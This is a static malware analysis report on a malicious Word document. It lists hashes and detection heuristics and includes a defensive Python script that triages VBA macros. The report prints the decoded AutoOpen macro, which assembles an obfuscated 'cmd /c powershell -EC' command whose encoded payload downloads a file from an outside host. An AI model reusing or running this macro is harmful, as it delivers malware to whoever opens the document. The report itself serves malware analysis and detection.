Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75d78787451c1a6e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 155.0 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 63b53438737ea23d0ba05081f8e39434
SHA-1: 9c57d517f966dea98da65980a108a5731e7b4f83
SHA-256: 75d78787451c1a6e19100e153a19c08bdec884e49a556e32ce0bdfee762dc63e
Risk score: 142

Heuristics (5)

  • ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code (the decoded source is the macros.bas artifact below).
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project defines Sub AutoOpen(), which Word runs as soon as the document is opened with macros enabled, so the payload needs no click beyond enabling content.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
    All three are OOXML XML namespace URIs from embedded document parts, not network indicators. The command string the macro assembles at run time from Chr() arithmetic and caret-escaped fragments does not appear here, because a plain string scan never sees it assembled.
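The check behind OLE_VBA_AUTOOPEN reduces to scanning the decoded module for procedure names that Office runs on its own. The script below is an added example, not part of this report or of oletools: it lists procedure definitions, flags the auto-execution names, and counts two obfuscation tells that are visible in this sample, the always-true guards of the form If 12 = 12 + (4 * 0) Then and characters spelled as Chr() arithmetic. SAMPLE_VBA is a constructed excerpt based on the macro preview later in this report.

```python
"""Triage an extracted VBA module for auto-execution entry points.

Added example; not part of this report or of oletools. SAMPLE_VBA is a
constructed excerpt based on the macro preview shown later in the report.
"""
import re

# Names Word/Excel run without user interaction (WordBasic-era and event procedures).
AUTOEXEC_NAMES = {
    "autoopen", "autoexec", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
    "workbook_open", "workbook_close", "auto_open", "auto_close",
}

PROC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(",
    re.IGNORECASE | re.MULTILINE)
# "If 12 = 12 + (4 * 0) Then": a guard that is always true, used in this
# sample to wrap dead assignments and inflate the module.
PAD_RE = re.compile(
    r"^\s*If\s+(\d+)\s*=\s*\1\s*\+\s*\(\s*\d+\s*\*\s*0\s*\)\s*Then",
    re.IGNORECASE | re.MULTILINE)
# "Chr(((20 + 5) * 4) + (10 / 10))": a character spelled as arithmetic.
CHR_RE = re.compile(r"\bChr\(\s*[\d\s()+\-*/]+\)", re.IGNORECASE)
ON_ERROR_RE = re.compile(r"^\s*On\s+Error\s+Resume\s+Next\b",
                         re.IGNORECASE | re.MULTILINE)


def triage(vba):
    """Return a summary dict for one VBA module's source text."""
    procs = [m.group(1) for m in PROC_RE.finditer(vba)]
    return {
        "procedures": procs,
        "autoexec": [p for p in procs if p.lower() in AUTOEXEC_NAMES],
        "on_error_resume_next": bool(ON_ERROR_RE.search(vba)),
        "padding_guards": len(PAD_RE.findall(vba)),
        "chr_arith": len(CHR_RE.findall(vba)),
    }


# Constructed excerpt: the first lines of the macro preview plus one
# shortened Chr() concatenation and a second guard from further down.
SAMPLE_VBA = """Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
On Error Resume Next
Dim DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(4)
If 12 = 12 + (4 * 0) Then
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(0) = CLng(889)
End If
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(1) = Sqr(4)
x = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x"
If 11 = 11 + (8 * 0) Then
SyWyDAzuRImOWAMEixEDBIhiTI(0) = CLng(519)
End If
End Sub
Sub Helper()
End Sub
"""

if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
```

On the excerpt this reports AutoOpen as the single auto-exec entry point, On Error Resume Next present, two padding guards and one Chr() arithmetic term; on the full macros.bas the guard and Chr() counts are what separate this module from a legitimately large one.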

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53993 bytes
SHA-256: a5f4670b278e1397ce0f7cf60b4a1bfec2c7b075dd6dbaf92457049757683c38
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const hyilADyMIQouHYvOrYLjaEKoKYqiqOByKONiwiP = 0
Sub AutoOpen()
On Error Resume Next
Dim DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(4)

If 12 = 12 + (4 * 0) Then
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(0) = CLng(889)
End If
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(1) = Sqr(4)
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(2) = Month(889889)
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(3) = Fix(889.4)
MALIBojOneDoMBEzYhOncoDESyPAFAMYTOtIlyhras = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + " /c p^O^w^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^R^s^H^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^L^L^.^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^x^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^c^A^a^Q^B^l^A^G^8^A^c^Q^B^r^A^H^g^A^a^w^B^h^A^G^w^A^c^w^A^u^A^G^M^A^b^w^B^t^A^C^8^A^V^g^B^S^A^E^U^A^L^w^B^r^A^G^8^A^d^A^B^u^A^G^U^A^c^g^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^0^A^a^Q^B^"
Dim GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(4)
Dim kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(4)

If 12 = 12 + (4 * 0) Then
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(0) = CLng(8328)
End If
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(1) = Sqr(4)
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(2) = Month(83288328)
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(3) = Fix(8328.4)
Dim rIRiFojhYMICUTaneGiaWyjufyNybIJYj(4)

If 10 = 10 + (5 * 0) Then
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(0) = CLng(888)
End If
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(1) = Sqr(5)
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(2) = Month(888888)
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(3) = Fix(888.5)

Dim SyWyDAzuRImOWAMEixEDBIhiTI(4)

If 11 = 11 + (8 * 0) Then
SyWyDAzuRImOWAMEixEDBIhiTI(0) = CLng(519)
End If
SyWyDAzuRImOWAMEixEDBIhiTI(1) = Sqr(8)
SyWyDAzuRImOWAMEixEDBIhiTI(2) = Month(519519)
SyWyDAzuRImOWAMEixEDBIhiTI(3) = Fix(519.8)
If 13 = 13 + (8 * 0) Then
Dim VHyZUlaRyaEbnInaEAbyJEquC(4)

If 11 = 11 + (2 * 0) Then
VHyZUlaRyaEbnInaEAbyJEquC(0) = CLng(3911)
End If
VHyZUlaRyaEbnInaEAbyJEquC(1) = Sqr(2)
VHyZUlaRyaEbnInaEAbyJEquC(2) = Month(39113911)
VHyZUlaRyaEbnInaEAbyJEquC(3) = Fix(3911.2)
Dim auDevUJAleiFowQAQaGyGsugUJU(4)

If 13 = 13 + (10 * 0) Then
auDevUJAleiFowQAQaGyGsugUJU(0) = CLng(4203)
End If
auDevUJAleiFowQAQaGyGsugUJU(1) = Sqr(10)
auDevUJAleiFowQAQaGyGsugUJU(2) = Month(42034203)
auDevUJAleiFowQAQaGyGsugUJU(3) = Fix(4203.1)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(0) = CLng(8281)
End If
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(1) = Sqr(8)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(2) = Month(82818281)
Dim KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(4)

If 10 = 10 + (4 * 0) Then
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(0) = CLng(9456)
End If
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(1) = Sqr(4)
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(2) = Month(94569456)
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(3) = Fix(9456.4)
Dim BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(4)

If 11 = 11 + (1 * 0) Then
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(0) = CLng(7659)
End If
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(1) = Sqr(1)
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(2) = Month(76597659)
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(3) = Fix(7659.1)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(3) = Fix(8281.8)
Dim HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(4)

If 10 = 10 + (3 * 0) Then
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(0) = CLng(3152)
End If
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(1) = Sqr(3)
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(2) = Month(31523152)
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(3) = Fix(3152.3)
Dim RYSylyniHUwiNiceXZAjodAMUS(4)

If 13 = 13 + (3 *
... (truncated)